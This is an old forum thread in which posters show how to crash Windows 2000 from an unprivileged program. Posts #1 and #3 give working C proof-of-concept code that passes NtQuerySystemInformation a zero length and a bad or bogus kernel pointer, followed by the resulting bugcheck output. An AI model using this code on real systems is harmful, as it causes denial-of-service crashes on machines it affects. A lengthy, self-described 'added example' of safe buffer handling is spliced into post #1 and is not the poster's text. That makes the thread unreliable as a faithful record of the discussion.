Thread: How to BSOD win2k

  1. #1

    How to BSOD win2k

    By accident I've found a way to BSOD win2k from usermode pretty reliably:

    #include <windows.h>
    #include <stdio.h>
    typedef DWORD (WINAPI *NtQSI) (DWORD, void*, DWORD, DWORD*);     // NtQuerySystemInformation
    int main()
    {
          DWORD size = 0, dwReturn;
          byte* buf;   // left uninitialized on purpose: MSVC debug builds fill it with 0xCC, hence the cccccccc in the bugcheck below
          NtQSI NtQuerySystemInformation = (NtQSI) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
          if (NtQuerySystemInformation == 0)
          {
                printf("Error: couldn't get NtQuerySystemInformation\n");
                return -1;
          }
          // get required buffer size – BUG, should be (11, buf, 1, &size), buf should hold at least 1 initialized byte
          NtQuerySystemInformation(11, buf, 0, &size);   // ModuleInformationClass
          buf = new byte[size];
          // the real call
          dwReturn = NtQuerySystemInformation(11, buf, size, &size);
          delete[] buf;
          return 0;
    }
    NtQuerySystemInformation is supposed to return the required buffer size if passed a too-small buffer - though it apparently tries to write something there even if passed size = 0.

    *** Fatal System Error: 0x00000050
    Break instruction exception - code 80000003 (first chance)
    A fatal system error has occurred.
    Debugger entered on first try; Bugcheck callbacks have not been invoked.
    BugCheck 50, {cccccccc, 1, 8049301b, 0}
    Probably caused by : ntoskrnl.exe ( nt!ExpQueryModuleInformation+c3 )
    Invalid system memory was referenced.  This cannot be protected by try-except,
    it must be protected by a Probe.  Typically the address is just plain bad or it
    is pointing at freed memory.
    Arg1: cccccccc, memory referenced.
    Arg2: 00000001, value 0 = read operation, 1 = write operation.
    Arg3: 8049301b, If non-zero, the instruction address which referenced the bad memory
    Arg4: 00000000, (reserved)
    XP behaves correctly though, even with uninitialized buffer and size=0.
    Vulnerant omnes, ultima necat.
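    As an added example (not code from the thread or from any poster), here is the buffer-size negotiation the first snippet skips: call with a real, zeroed buffer and its true length, and when the kernel answers STATUS_INFO_LENGTH_MISMATCH, grow to the reported size and retry. The status values and the NtQuerySystemInformation signature are the real ones; query_with_retry, fake_query and FAKE_MODULE_LIST are names invented here, and the stand-in data is constructed so the loop can be exercised on a non-Windows host. The stand-in also models what the win2k handler failed to do: it never writes into a buffer it was told is too small. This shows only the well-behaved caller; the actual fix for the bugcheck belongs in the kernel, which must probe a user pointer before writing through it.

```c
/* Added example, not code from the thread: the size negotiation the first
 * snippet skipped. The query routine is passed in as a function pointer so
 * the loop binds to ntdll!NtQuerySystemInformation on Windows and to a
 * constructed stand-in (fake_query) elsewhere; query_with_retry and
 * FAKE_MODULE_LIST are names invented for this example. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#define QCALL NTAPI                    /* __stdcall on x86, matching ntdll's export */
#else
#define QCALL
#endif

/* Status codes from ntstatus.h (NTSTATUS is a 32-bit LONG; compared as uint32_t here). */
#define NT_SUCCESS_CODE            0x00000000u
#define NT_INFO_LENGTH_MISMATCH    0xC0000004u   /* STATUS_INFO_LENGTH_MISMATCH */
#define NT_INVALID_INFO_CLASS      0xC0000003u   /* STATUS_INVALID_INFO_CLASS */
#define SYSTEM_MODULE_INFORMATION  11u           /* SystemModuleInformation */

/* Shape of NtQuerySystemInformation(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG). */
typedef uint32_t (QCALL *query_fn)(uint32_t cls, void *buf, uint32_t len, uint32_t *ret_len);

/* Query `cls` through `q`, growing the buffer until the call succeeds.
 * Returns a malloc'd buffer and sets *out_len, or NULL on failure;
 * *attempts receives the number of calls made. The buffer passed to the
 * kernel is always real, zeroed memory with its true length: never an
 * uninitialized pointer with length 0, which is what crashed the win2k box. */
static void *query_with_retry(query_fn q, uint32_t cls, uint32_t *out_len, int *attempts)
{
    uint32_t len = 16;                  /* deliberately small: forces one mismatch round */
    void *buf = calloc(1, len);
    int n = 0;

    while (buf != NULL && n < 8) {      /* bounded so a misbehaving class cannot spin forever */
        uint32_t needed = 0;
        uint32_t st = q(cls, buf, len, &needed);
        n++;
        if (st == NT_SUCCESS_CODE) {
            *out_len = (needed != 0 && needed <= len) ? needed : len;
            if (attempts) *attempts = n;
            return buf;
        }
        free(buf);
        buf = NULL;
        if (st != NT_INFO_LENGTH_MISMATCH)
            break;                      /* any other status is a genuine error */
        /* Use the size the kernel reported; some classes report 0, so fall back to doubling. */
        len = (needed > len) ? needed : len * 2;
        buf = calloc(1, len);
    }
    free(buf);
    if (attempts) *attempts = n;
    *out_len = 0;
    return NULL;
}

/* Constructed stand-in for the kernel side (sample data, not real module information):
 * honours the caller's length, reports the required size on mismatch and, unlike the
 * win2k handler, never writes into a buffer it was told is too small. */
#define FAKE_MODULE_LIST "ntoskrnl.exe;hal.dll;ntdll.dll"
static uint32_t QCALL fake_query(uint32_t cls, void *buf, uint32_t len, uint32_t *ret_len)
{
    uint32_t need = (uint32_t)sizeof(FAKE_MODULE_LIST);
    if (cls != SYSTEM_MODULE_INFORMATION)
        return NT_INVALID_INFO_CLASS;
    if (ret_len) *ret_len = need;
    if (len < need)
        return NT_INFO_LENGTH_MISMATCH;
    memcpy(buf, FAKE_MODULE_LIST, need);
    return NT_SUCCESS_CODE;
}

int main(void)
{
    uint32_t len = 0;
    int tries = 0;
    query_fn q = fake_query;
    void *buf;
#ifdef _WIN32
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    q = ntdll ? (query_fn)GetProcAddress(ntdll, "NtQuerySystemInformation") : NULL;
    if (q == NULL) { puts("cannot resolve NtQuerySystemInformation"); return 1; }
#endif
    buf = query_with_retry(q, SYSTEM_MODULE_INFORMATION, &len, &tries);
    if (buf == NULL) { puts("query failed"); return 1; }
    printf("%u bytes after %d call(s)\n", len, tries);
#ifdef _WIN32
    /* SystemModuleInformation returns an RTL_PROCESS_MODULES; its first ULONG is NumberOfModules. */
    printf("NumberOfModules = %u\n", *(uint32_t *)buf);
#else
    printf("stand-in data: %s\n", (char *)buf);
#endif
    free(buf);
    return 0;
}
```

    On Windows the program prints the byte count and the module count from the real call; elsewhere it runs the same loop against the stand-in, which needs exactly two calls (one mismatch, one success). The attempt cap and the doubling fallback are there because the length reported on mismatch is not reliable for every information class.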

  2. #2
    dELTA (Administrator)
    Hehe, cool, nice work.

  3. #3
    Well, it's not crashing anymore... I guess I was too quick to call it "reliable".

    Edit: found one compiled executable that still "works" (crashes the OS) for me; I have to take a look at it.

    Edit2: Finally, reproduced the crash. Sample code:

    #include <windows.h>
    typedef DWORD (WINAPI *NtQSI) (DWORD, void*, DWORD, DWORD*);	// NtQuerySystemInformation
    int main()
    {
    	DWORD size;
    	NtQSI NtQuerySystemInformation = (NtQSI) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
    	if (NtQuerySystemInformation == 0)
    		return -1;
    	// size = 0 with a bogus kernel-space buffer pointer: the kernel writes to it anyway and bugchecks
    	NtQuerySystemInformation(11, (void*)0xcccccccc, 0, &size);
    	return 0;
    }
    Last edited by omega_red; December 13th, 2005 at 09:24.
    Vulnerant omnes, ultima necat.

  4. #4
    Nice work. You found a buffer-overflow vulnerability.
